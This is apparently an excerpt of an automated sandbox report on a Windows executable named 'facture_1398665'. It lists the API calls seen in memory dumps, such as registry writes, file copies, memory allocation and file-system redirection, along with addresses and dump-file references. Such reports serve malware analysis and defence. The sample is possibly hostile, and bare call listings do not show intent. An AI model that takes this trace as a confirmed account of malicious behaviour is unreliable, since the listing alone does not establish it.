    APIs
    • SendMessageW.USER32(?,?,?,00000000), ref: 00415022
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • DrawTextW.USER32(?,00000000,00000000,?,?), ref: 004A4977
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • DestroyWindow.USER32(?), ref: 0045FE24
      • Part of subcall function 004135BC: GetLastError.KERNEL32(0040AA79,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7), ref: 004135BC
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetFileAttributesW.KERNEL32(00000000,00000000,0047EB36,?,00000000,00000000,?,0047EB86,00000000,004AD259,00000000,004AD27A,?,00000000,00000000,00000000), ref: 0047EB19
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004AAB4D
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 004080EE
      • Part of subcall function 00408370: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00400000,005027F0), ref: 0040838C
      • Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,005027F0), ref: 004083AC
      • Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,005027F0), ref: 004083CA
      • Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 004083E8
      • Part of subcall function 00408370: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00408406
      • Part of subcall function 00408370: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 0040844F
      • Part of subcall function 00408370: RegQueryValueExW.ADVAPI32(?,00408698,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001), ref: 0040846D
      • Part of subcall function 00408370: RegCloseKey.ADVAPI32(?,004084AB,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040849E
      • Part of subcall function 00408370: lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 004084BB
      • Part of subcall function 00408370: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004084C8
      • Part of subcall function 00408370: GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004084CE
      • Part of subcall function 00408370: lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004084FC
      • Part of subcall function 00408370: lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408552
      • Part of subcall function 00408370: LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00408562
      • Part of subcall function 00408370: lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408592
      • Part of subcall function 00408370: LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004085A2
      • Part of subcall function 00408370: lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004085D1
      • Part of subcall function 00408370: LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 004085E1
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • DefWindowProcW.USER32(?,?,?,?), ref: 0047B449
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetComputerNameW.KERNEL32(?), ref: 004B0037
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • DefWindowProcW.USER32(?,?,?,?), ref: 00481450
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetFileAttributesW.KERNEL32(00000000,00000000,004ABD07,00000000,?), ref: 0047EB4F
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetCurrentDirectoryW.KERNEL32(00000000,?,004FDB42,00000000,004FDD55,?,00000000,004FDD8E,?,?,00000000,?), ref: 0040DD0F
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetEndOfFile.KERNEL32(?,?,004B8267,00000000,004B83F9,?,00000000,00000002,00000002), ref: 004AAC7B
      • Part of subcall function 004AA9EC: GetLastError.KERNEL32(004AA780,004AAAB7,?,004FDBB4,00000001,00000000,00000002,00000000,004FDD55,?,00000000,004FDD8E,?,?,00000000,?), ref: 004AA9EF
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetErrorMode.KERNEL32(?,00413CB1), ref: 00413CA4
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetErrorMode.KERNEL32(?,00413CB1), ref: 00413CA4
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,0050BC38,00000000,00000000,?,0042BE6B,00000000,00000B06,00000000,00400000,00000000,00000000,00000000), ref: 0042BD26
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004ACF58: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF73
      • Part of subcall function 004ACF58: SetLastError.KERNEL32(00000001,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF8A
      • Part of subcall function 004AAB10: CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004AAB4D
    • GetLastError.KERNEL32(00000000,004AD870), ref: 004AD852
      • Part of subcall function 004ACF94: Wow64RevertWow64FsRedirection.KERNEL32(?,004AD5BB,004AD5C3,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF9D
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401E07,?,004023AC), ref: 0040180E
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd

    Non-executed Functions

    APIs
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F2E53
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F2EF6
    • RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F303D
    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F3054
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F31FF
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F32C2
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000004,?,00000001,00000000,00000000,004F3B6A,?,?,?,?,00000000), ref: 004F3366
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,?,00000004,?,00000001,00000000,00000000,004F3B6A), ref: 004F33A0
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000001,00000000,00000000,004F3B6A,?,?,?,?,00000000), ref: 004F3441
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000001,00000000,00000000), ref: 004F346F
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,?,00000001,00000000,00000000,004F3B6A), ref: 004F34B0
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F3564
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,004F3B6A), ref: 004F35B1
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,004F3B6A), ref: 004F35D6
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000002,00000000,?,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F369B
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,?,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F36C0
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000007,00000000,00000001,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F37B3
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000007,00000000,00000001,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F37D8
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000004,?,00000004,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F3888
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000004,?,00000004,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F38AD
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000003,?,?,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F3973
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000003,?,?,00000000,004F3B6A,?,?,?,?,00000000,00000000), ref: 004F3998
      • Part of subcall function 004AD73C: GetLastError.KERNEL32(00000000,004AD799), ref: 004AD77B
      • Part of subcall function 004802FC: GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 00480323
      • Part of subcall function 004802FC: RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 00480376
      • Part of subcall function 004802FC: RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 004803AE
      • Part of subcall function 00480294: GetDC.USER32(00000000), ref: 004802A3
      • Part of subcall function 00480294: EnumFontsW.GDI32(?,00000000,00480280,00000000), ref: 004802CE
      • Part of subcall function 00480294: ReleaseDC.USER32(00000000,?), ref: 004802E6
      • Part of subcall function 0047FCE8: RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0047FD14
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
      • Part of subcall function 004F21A0: RegEnumKeyExW.ADVAPI32(?,00000001,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004F2254
      • Part of subcall function 004F21A0: RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,004F234C,?,?,?,00000000,00000000,004F2372), ref: 004F2278
      • Part of subcall function 004F21A0: RegCloseKey.ADVAPI32(?,004F2353,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004F2346
      • Part of subcall function 0047FF64: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 0047FFAC
      • Part of subcall function 0047FF64: RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 0047FFB7
      • Part of subcall function 0047FDE0: RegEnumKeyExW.ADVAPI32(004FD344,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0047FF25,?,004FD344,00000008,00000000,00000000,0047FF53), ref: 0047FE99
      • Part of subcall function 0047FDE0: RegCloseKey.ADVAPI32(004FD344,0047FF2C,?,00000000,00000000,00000000,00000000,00000000,0047FF25,?,004FD344,00000008,00000000,00000000,0047FF53), ref: 0047FF1F
      • Part of subcall function 0047FC60: RegQueryValueExW.ADVAPI32(005043A4,0000001B,00000000,00000000,00000000,00000000), ref: 0047FC75
      • Part of subcall function 0047FC60: RegEnumValueW.ADVAPI32(005043A4,00000000,0000001B,0000001B,00000000,00000000,00000000,00000000,005043A4,0000001B,00000000,00000000,00000000), ref: 0047FCB7
      • Part of subcall function 004AD0B4: CopyFileW.KERNEL32(00000000,00000000,?), ref: 004AD0FA
      • Part of subcall function 004AD0B4: GetLastError.KERNEL32(00000000,00000000,?,00000000,004AD120), ref: 004AD102
      • Part of subcall function 0047F814: GetVersion.KERNEL32(00000000,0047F893,?,?,?,00000000,00000000), ref: 0047F833
      • Part of subcall function 0047F76C: GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,004AE3B7,00000000,004AE485,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004AE8AA), ref: 0047F788
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
      • Part of subcall function 0047F714: GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,004AE66B,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000), ref: 0047F727
      • Part of subcall function 0047F29C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F), ref: 0047F2D1
      • Part of subcall function 0047F29C: GetCommandLineW.KERNEL32(00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F,?,?,?,?,00000000), ref: 0047F2E7
      • Part of subcall function 0047F23C: GetCommandLineW.KERNEL32(00000000,0047F28D,?,?,?,00000000,?,004FE9F4,00000000,004FEB5C,?,?,?,?,00000000,00000000), ref: 0047F251
      • Part of subcall function 0047F17C: GetCommandLineW.KERNEL32(00000000,0047F1BE,?,00000000,00000000,?,004E2AD9,-00000010,?,00000004,0000001C,00000000,004E2CF7,?,004B9C20,00000000), ref: 0047F192
      • Part of subcall function 0047F040: GetEnvironmentVariableW.KERNEL32(00000000,00000000,?,00000003,?,?,?,0047F8EC,00000000,0047F97F,?,0050B17C,00000000,00000000,?,004AE2A2), ref: 0047F076
      • Part of subcall function 0047F004: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0047F022
      • Part of subcall function 0047F004: WriteProfileStringW.KERNEL32(00000000,00000000,00000000), ref: 0047F036
      • Part of subcall function 0047EFB8: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0047EFDF
      • Part of subcall function 0047EFB8: WriteProfileStringW.KERNEL32(00000000,00000000,00000000), ref: 0047EFF8
      • Part of subcall function 0047EED0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0047EF06
      • Part of subcall function 0047EED0: WriteProfileStringW.KERNEL32(00000000,00000000,00000000), ref: 0047EF2C
      • Part of subcall function 0047EE5C: GetPrivateProfileStringW.KERNEL32(00000000,00000000,0047EECC,?,00000100,00000000), ref: 0047EE93
      • Part of subcall function 0047EE5C: GetProfileStringW.KERNEL32(00000000,00000000,0047EECC,?,00000100), ref: 0047EEB3
      • Part of subcall function 0047EBB4: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0047EC2A
      • Part of subcall function 0047EBB4: GetProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,00000100), ref: 0047EC57
      • Part of subcall function 004AD224: GetLastError.KERNEL32(00000000,004AD27A,?,00000000,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004AD25C
      • Part of subcall function 004AD1B4: GetLastError.KERNEL32(00000000,004AD20A), ref: 004AD1EC
